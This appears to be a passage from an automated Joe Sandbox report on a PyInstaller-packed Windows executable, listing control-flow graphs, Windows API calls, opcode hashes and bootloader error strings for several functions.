                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                          • Opcode ID: d1e6bd486bfc21eb95dee70b45366dac06352df6756fd9cebcf35b02e344c8c8
                                                                                                                                          • Instruction ID: c992fb480c480801cd29bb26c40c7334abb82d7f4169fa886a75b983aac7de09
                                                                                                                                          • Opcode Fuzzy Hash: d1e6bd486bfc21eb95dee70b45366dac06352df6756fd9cebcf35b02e344c8c8
                                                                                                                                          • Instruction Fuzzy Hash: 49027931B09E9681FA65EB229511279E691AF43FB0F488634DD6EC67D6FF7EE4018300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 7ff61d321710-7ff61d321724 1 7ff61d321726-7ff61d32173d call 7ff61d322b30 0->1 2 7ff61d32173e-7ff61d321742 0->2 4 7ff61d321768-7ff61d32178b call 7ff61d327c20 2->4 5 7ff61d321744-7ff61d32174d call 7ff61d3212b0 2->5 13 7ff61d3217b9-7ff61d3217d4 call 7ff61d323fe0 4->13 14 7ff61d32178d-7ff61d3217b8 call 7ff61d322890 4->14 11 7ff61d32175f-7ff61d321767 5->11 12 7ff61d32174f-7ff61d32175a call 7ff61d322b30 5->12 12->11 20 7ff61d3217d6-7ff61d3217e9 call 7ff61d322b30 13->20 21 7ff61d3217ee-7ff61d321801 call 7ff61d330914 13->21 26 7ff61d32192f-7ff61d321932 call 7ff61d33028c 20->26 27 7ff61d321823-7ff61d321827 21->27 28 7ff61d321803-7ff61d32181e call 7ff61d322890 21->28 34 7ff61d321937-7ff61d32194e 26->34 31 7ff61d321829-7ff61d321835 call 7ff61d321050 27->31 32 7ff61d321841-7ff61d321861 call 7ff61d335090 27->32 37 7ff61d321927-7ff61d32192a call 7ff61d33028c 28->37 38 7ff61d32183a-7ff61d32183c 31->38 41 7ff61d321863-7ff61d32187d call 7ff61d322890 32->41 42 7ff61d321882-7ff61d321888 32->42 37->26 38->37 49 7ff61d32191d-7ff61d321922 41->49 43 7ff61d32188e-7ff61d321897 42->43 44 7ff61d321915-7ff61d321918 call 7ff61d33507c 42->44 48 7ff61d3218a0-7ff61d3218c2 call 7ff61d3305dc 43->48 44->49 52 7ff61d3218f5-7ff61d3218fc 48->52 53 7ff61d3218c4-7ff61d3218dc call 7ff61d330d1c 48->53 49->37 55 7ff61d321903-7ff61d32190b call 7ff61d322890 52->55 58 7ff61d3218de-7ff61d3218e1 53->58 59 7ff61d3218e5-7ff61d3218f3 53->59 61 7ff61d321910 55->61 58->48 62 7ff61d3218e3 58->62 59->55 61->44 62->61
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message
                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                          • API String ID: 2030045667-3833288071
                                                                                                                                          • Opcode ID: e432b7d969ae4dbc6f679bdd4cd7d56ef0903eb873a48b01967f492b65c7d69d
                                                                                                                                          • Instruction ID: 4955432559e0494990f4a032f426060fec0e89ccbdc9aecf7b5594f94b96b6aa
                                                                                                                                          • Opcode Fuzzy Hash: e432b7d969ae4dbc6f679bdd4cd7d56ef0903eb873a48b01967f492b65c7d69d
                                                                                                                                          • Instruction Fuzzy Hash: 17518D79F08E4296EA149B25E9502B9E390BF46FE8F444131DE0C87795FF3DE6448780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _fread_nolock$Message
                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                          • API String ID: 677216364-1384898525
                                                                                                                                          • Opcode ID: 85aa4d4b5c56209b993ac3b9d5e51e7e884d9423aace791278502c5c1bfd56ec
                                                                                                                                          • Instruction ID: 280731f78be7db63f2ac4c255b42671ab0960da5e6c0afb21d6732038dc8d8d7
                                                                                                                                          • Opcode Fuzzy Hash: 85aa4d4b5c56209b993ac3b9d5e51e7e884d9423aace791278502c5c1bfd56ec
                                                                                                                                          • Instruction Fuzzy Hash: 2B51A176E09E4286EB18CF29E550178B7A0EF4AFA8B558135D90CC7799EF7CE440C784
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 266 7ff61d321000-7ff61d3239d6 call 7ff61d330060 call 7ff61d330058 call 7ff61d3287b0 call 7ff61d330058 call 7ff61d32bd60 call 7ff61d3353f0 call 7ff61d335ff8 call 7ff61d321eb0 284 7ff61d3239dc-7ff61d3239ec call 7ff61d323ed0 266->284 285 7ff61d323b7f 266->285 284->285 290 7ff61d3239f2-7ff61d323a05 call 7ff61d323da0 284->290 287 7ff61d323b84-7ff61d323ba4 call 7ff61d32bdc0 285->287 290->285 294 7ff61d323a0b-7ff61d323a32 call 7ff61d327b70 290->294 297 7ff61d323a74-7ff61d323a9c call 7ff61d328050 call 7ff61d321cb0 294->297 298 7ff61d323a34-7ff61d323a43 call 7ff61d327b70 294->298 309 7ff61d323b4d-7ff61d323b5e 297->309 310 7ff61d323aa2-7ff61d323ab8 call 7ff61d321cb0 297->310 298->297 303 7ff61d323a45-7ff61d323a4b 298->303 305 7ff61d323a57-7ff61d323a71 call 7ff61d33507c call 7ff61d328050 303->305 306 7ff61d323a4d-7ff61d323a55 303->306 305->297 306->305 311 7ff61d323b60-7ff61d323b67 309->311 312 7ff61d323bb2-7ff61d323bb5 309->312 320 7ff61d323ad7-7ff61d323ada 310->320 321 7ff61d323aba-7ff61d323ad2 call 7ff61d322b30 310->321 311->312 318 7ff61d323b69-7ff61d323b71 call 7ff61d328980 311->318 316 7ff61d323bb7-7ff61d323bbd 312->316 317 7ff61d323bcb-7ff61d323be3 call 7ff61d328be0 312->317 322 7ff61d323bfb-7ff61d323c08 call 7ff61d326df0 316->322 323 7ff61d323bbf-7ff61d323bc9 316->323 334 7ff61d323bee-7ff61d323bf5 SetDllDirectoryW 317->334 335 7ff61d323be5-7ff61d323bec 317->335 336 7ff61d323b73 318->336 337 7ff61d323ba5-7ff61d323ba8 call 7ff61d3214f0 318->337 320->309 328 7ff61d323adc-7ff61d323af3 call 7ff61d323fe0 320->328 321->285 341 7ff61d323c0a-7ff61d323c17 call 7ff61d326aa0 322->341 342 7ff61d323c53-7ff61d323c58 call 7ff61d326d70 322->342 323->317 323->322 345 7ff61d323afa-7ff61d323b26 call 7ff61d3282c0 328->345 346 7ff61d323af5-7ff61d323af8 328->346 334->322 340 7ff61d323b7a call 7ff61d322b30 335->340 336->340 344 7ff61d323bad-7ff61d323bb0 337->344 340->285 341->342 358 7ff61d323c19-7ff61d323c28 call 7ff61d326600 341->358 352 7ff61d323c5d-7ff61d323c60 342->352 344->285 344->312 345->309 362 7ff61d323b28-7ff61d323b30 call 7ff61d33028c 345->362 350 7ff61d323b35-7ff61d323b4b call 7ff61d322b30 346->350 350->285 356 7ff61d323d06-7ff61d323d15 call 7ff61d3234c0 352->356 357 7ff61d323c66-7ff61d323c70 352->357 356->285 373 7ff61d323d1b-7ff61d323d74 call 7ff61d328950 call 7ff61d327fe0 call 7ff61d327b70 call 7ff61d323620 call 7ff61d328090 call 7ff61d326850 call 7ff61d326d70 356->373 363 7ff61d323c73-7ff61d323c7d 357->363 371 7ff61d323c49-7ff61d323c4e call 7ff61d326850 358->371 372 7ff61d323c2a-7ff61d323c36 call 7ff61d326580 358->372 362->350 367 7ff61d323c86-7ff61d323c88 363->367 368 7ff61d323c7f-7ff61d323c84 363->368 369 7ff61d323c8a-7ff61d323cad call 7ff61d321ef0 367->369 370 7ff61d323cd1-7ff61d323d01 call 7ff61d323620 call 7ff61d323460 call 7ff61d323610 call 7ff61d326850 call 7ff61d326d70 367->370 368->363 368->367 369->285 384 7ff61d323cb3-7ff61d323cbd 369->384 370->287 371->342 372->371 385 7ff61d323c38-7ff61d323c47 call 7ff61d326c40 372->385 409 7ff61d323d76-7ff61d323d7d call 7ff61d327d50 373->409 410 7ff61d323d82-7ff61d323d85 call 7ff61d321e80 373->410 388 7ff61d323cc0-7ff61d323ccf 384->388 385->352 388->370 388->388 409->410 413 7ff61d323d8a-7ff61d323d8c 410->413 413->287
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FF61D323ED0: GetModuleFileNameW.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D323F01
                                                                                                                                          • SetDllDirectoryW.KERNEL32 ref: 00007FF61D323BF5
                                                                                                                                            • Part of subcall function 00007FF61D327B70: GetEnvironmentVariableW.KERNEL32(00007FF61D323A1F), ref: 00007FF61D327BAA
                                                                                                                                            • Part of subcall function 00007FF61D327B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF61D327BC7
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                          • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                          • API String ID: 2344891160-1544818733
                                                                                                                                          • Opcode ID: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
                                                                                                                                          • Instruction ID: 1fa9314695e2345acf310355525a010de49a559d3ff873518dd9ba255b28a94a
                                                                                                                                          • Opcode Fuzzy Hash: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
                                                                                                                                          • Instruction Fuzzy Hash: DFB18F32E1DE8751EA65AB3199502FDE250BF46FA8F40013AEA4DC7696FF2CE505C780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                          • String ID: CreateProcessW$Error creating child process!
                                                                                                                                          • API String ID: 2895956056-3524285272
                                                                                                                                          • Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                                                                          • Instruction ID: 0c3c1b179a4f1c87c439aadd51201335db5ca5efd7140e16b9caded2521b56ba
                                                                                                                                          • Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                                                                          • Instruction Fuzzy Hash: E6412131A08B8181DA24DB24F5552AAE361FF95BB4F500735E6AD83BD5EF7CD044CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 507 7ff61d321050-7ff61d3210ab call 7ff61d32b5e0 510 7ff61d3210ad-7ff61d3210d2 call 7ff61d322b30 507->510 511 7ff61d3210d3-7ff61d3210eb call 7ff61d335090 507->511 516 7ff61d321109-7ff61d321119 call 7ff61d335090 511->516 517 7ff61d3210ed-7ff61d321104 call 7ff61d322890 511->517 523 7ff61d321137-7ff61d321147 516->523 524 7ff61d32111b-7ff61d321132 call 7ff61d322890 516->524 522 7ff61d32126c-7ff61d321281 call 7ff61d32b2c0 call 7ff61d33507c * 2 517->522 539 7ff61d321286-7ff61d3212a0 522->539 526 7ff61d321150-7ff61d321175 call 7ff61d3305dc 523->526 524->522 534 7ff61d32117b-7ff61d321185 call 7ff61d330350 526->534 535 7ff61d32125e 526->535 534->535 541 7ff61d32118b-7ff61d321197 534->541 537 7ff61d321264 535->537 537->522 542 7ff61d3211a0-7ff61d3211c8 call 7ff61d329a90 541->542 545 7ff61d3211ca-7ff61d3211cd 542->545 546 7ff61d321241-7ff61d32125c call 7ff61d322b30 542->546 547 7ff61d32123c 545->547 548 7ff61d3211cf-7ff61d3211d9 545->548 546->537 547->546 550 7ff61d3211db-7ff61d3211e8 call 7ff61d330d1c 548->550 551 7ff61d321203-7ff61d321206 548->551 557 7ff61d3211ed-7ff61d3211f0 550->557 554 7ff61d321219-7ff61d32121e 551->554 555 7ff61d321208-7ff61d321216 call 7ff61d32cb40 551->555 554->542 556 7ff61d321220-7ff61d321223 554->556 555->554 560 7ff61d321237-7ff61d32123a 556->560 561 7ff61d321225-7ff61d321228 556->561 562 7ff61d3211fe-7ff61d321201 557->562 563 7ff61d3211f2-7ff61d3211fc call 7ff61d330350 557->563 560->537 561->546 564 7ff61d32122a-7ff61d321232 561->564 562->546 563->554 563->562 564->526
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message
                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                          • API String ID: 2030045667-2813020118
                                                                                                                                          • Opcode ID: 7b2c84c99ae358eb5436a0da81528e03949e6f2c70fa16e61cc33f909cd68913
                                                                                                                                          • Instruction ID: b56199326b3d5b0e9c45c583d1827e594e2e6a0f7ed9b0fb512275246277a61f
                                                                                                                                          • Opcode Fuzzy Hash: 7b2c84c99ae358eb5436a0da81528e03949e6f2c70fa16e61cc33f909cd68913
                                                                                                                                          • Instruction Fuzzy Hash: 4F51A136E09A8285E6649B61E5503BAE2A0BF46FB8F444231ED4DC7799FF3CE505C780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF61D33F66A,?,?,-00000018,00007FF61D33B417,?,?,?,00007FF61D33B30E,?,?,?,00007FF61D336552), ref: 00007FF61D33F44C
                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF61D33F66A,?,?,-00000018,00007FF61D33B417,?,?,?,00007FF61D33B30E,?,?,?,00007FF61D336552), ref: 00007FF61D33F458
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                          • Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                                                          • Instruction ID: ae9b3d5a0a4a537d57742aa36ef36b732b8285b64b199eb7245dbb387af04b79
                                                                                                                                          • Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                                                          • Instruction Fuzzy Hash: FB411332B19E5251FA1ADB16AA005B6A391BF4AFB0F884135DD4DD7784FF3CE44A8300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 664 7ff61d33c11c-7ff61d33c142 665 7ff61d33c15d-7ff61d33c161 664->665 666 7ff61d33c144-7ff61d33c158 call 7ff61d3355a4 call 7ff61d3355c4 664->666 668 7ff61d33c537-7ff61d33c543 call 7ff61d3355a4 call 7ff61d3355c4 665->668 669 7ff61d33c167-7ff61d33c16e 665->669 682 7ff61d33c54e 666->682 688 7ff61d33c549 call 7ff61d33afa4 668->688 669->668 671 7ff61d33c174-7ff61d33c1a2 669->671 671->668 674 7ff61d33c1a8-7ff61d33c1af 671->674 677 7ff61d33c1c8-7ff61d33c1cb 674->677 678 7ff61d33c1b1-7ff61d33c1c3 call 7ff61d3355a4 call 7ff61d3355c4 674->678 680 7ff61d33c1d1-7ff61d33c1d7 677->680 681 7ff61d33c533-7ff61d33c535 677->681 678->688 680->681 686 7ff61d33c1dd-7ff61d33c1e0 680->686 685 7ff61d33c551-7ff61d33c568 681->685 682->685 686->678 689 7ff61d33c1e2-7ff61d33c207 686->689 688->682 692 7ff61d33c209-7ff61d33c20b 689->692 693 7ff61d33c23a-7ff61d33c241 689->693 695 7ff61d33c20d-7ff61d33c214 692->695 696 7ff61d33c232-7ff61d33c238 692->696 697 7ff61d33c216-7ff61d33c22d call 7ff61d3355a4 call 7ff61d3355c4 call 7ff61d33afa4 693->697 698 7ff61d33c243-7ff61d33c26b call 7ff61d33dcbc call 7ff61d33b00c * 2 693->698 695->696 695->697 701 7ff61d33c2b8-7ff61d33c2cf 696->701 729 7ff61d33c3c0 697->729 725 7ff61d33c288-7ff61d33c2b3 call 7ff61d33c944 698->725 726 7ff61d33c26d-7ff61d33c283 call 7ff61d3355c4 call 7ff61d3355a4 698->726 704 7ff61d33c34a-7ff61d33c354 call 7ff61d34408c 701->704 705 7ff61d33c2d1-7ff61d33c2d9 701->705 717 7ff61d33c35a-7ff61d33c36f 704->717 718 7ff61d33c3de 704->718 705->704 706 7ff61d33c2db-7ff61d33c2dd 705->706 706->704 710 7ff61d33c2df-7ff61d33c2f5 706->710 710->704 714 7ff61d33c2f7-7ff61d33c303 710->714 714->704 719 7ff61d33c305-7ff61d33c307 714->719 717->718 723 7ff61d33c371-7ff61d33c383 GetConsoleMode 717->723 721 7ff61d33c3e3-7ff61d33c403 ReadFile 718->721 719->704 724 7ff61d33c309-7ff61d33c321 719->724 727 7ff61d33c409-7ff61d33c411 721->727 728 7ff61d33c4fd-7ff61d33c506 GetLastError 721->728 723->718 730 7ff61d33c385-7ff61d33c38d 723->730 724->704 734 7ff61d33c323-7ff61d33c32f 724->734 725->701 726->729 727->728 736 7ff61d33c417 727->736 731 7ff61d33c508-7ff61d33c51e call 7ff61d3355c4 call 7ff61d3355a4 728->731 732 7ff61d33c523-7ff61d33c526 728->732 733 7ff61d33c3c3-7ff61d33c3cd call 7ff61d33b00c 729->733 730->721 738 7ff61d33c38f-7ff61d33c3b1 ReadConsoleW 730->738 731->729 742 7ff61d33c3b9-7ff61d33c3bb call 7ff61d335538 732->742 743 7ff61d33c52c-7ff61d33c52e 732->743 733->685 734->704 741 7ff61d33c331-7ff61d33c333 734->741 745 7ff61d33c41e-7ff61d33c433 736->745 747 7ff61d33c3b3 GetLastError 738->747 748 7ff61d33c3d2-7ff61d33c3dc 738->748 741->704 752 7ff61d33c335-7ff61d33c345 741->752 742->729 743->733 745->733 754 7ff61d33c435-7ff61d33c440 745->754 747->742 748->745 752->704 757 7ff61d33c467-7ff61d33c46f 754->757 758 7ff61d33c442-7ff61d33c45b call 7ff61d33bd34 754->758 759 7ff61d33c4eb-7ff61d33c4f8 call 7ff61d33bb74 757->759 760 7ff61d33c471-7ff61d33c483 757->760 766 7ff61d33c460-7ff61d33c462 758->766 759->766 763 7ff61d33c4de-7ff61d33c4e6 760->763 764 7ff61d33c485 760->764 763->733 767 7ff61d33c48a-7ff61d33c491 764->767 766->733 769 7ff61d33c4cd-7ff61d33c4d8 767->769 770 7ff61d33c493-7ff61d33c497 767->770 769->763 771 7ff61d33c499-7ff61d33c4a0 770->771 772 7ff61d33c4b3 770->772 771->772 773 7ff61d33c4a2-7ff61d33c4a6 771->773 774 7ff61d33c4b9-7ff61d33c4c9 772->774 773->772 775 7ff61d33c4a8-7ff61d33c4b1 773->775 774->767 776 7ff61d33c4cb 774->776 775->774 776->763
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
                                                                                                                                          • Instruction ID: 34495b665a8c5f66a67992df6a95ff3e917f44e28e64af993416ffb240cfcfdc
                                                                                                                                          • Opcode Fuzzy Hash: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
                                                                                                                                          • Instruction Fuzzy Hash: 8BC1C232A0CF86A1FA65DB1696402BDB7A1EB92FB0F554131DA4E87391EF7CE8458700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                          • Opcode ID: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
                                                                                                                                          • Instruction ID: f59623401c30de56857ae4bea3c42aa33867f3e4e515885defac46ef0a115632
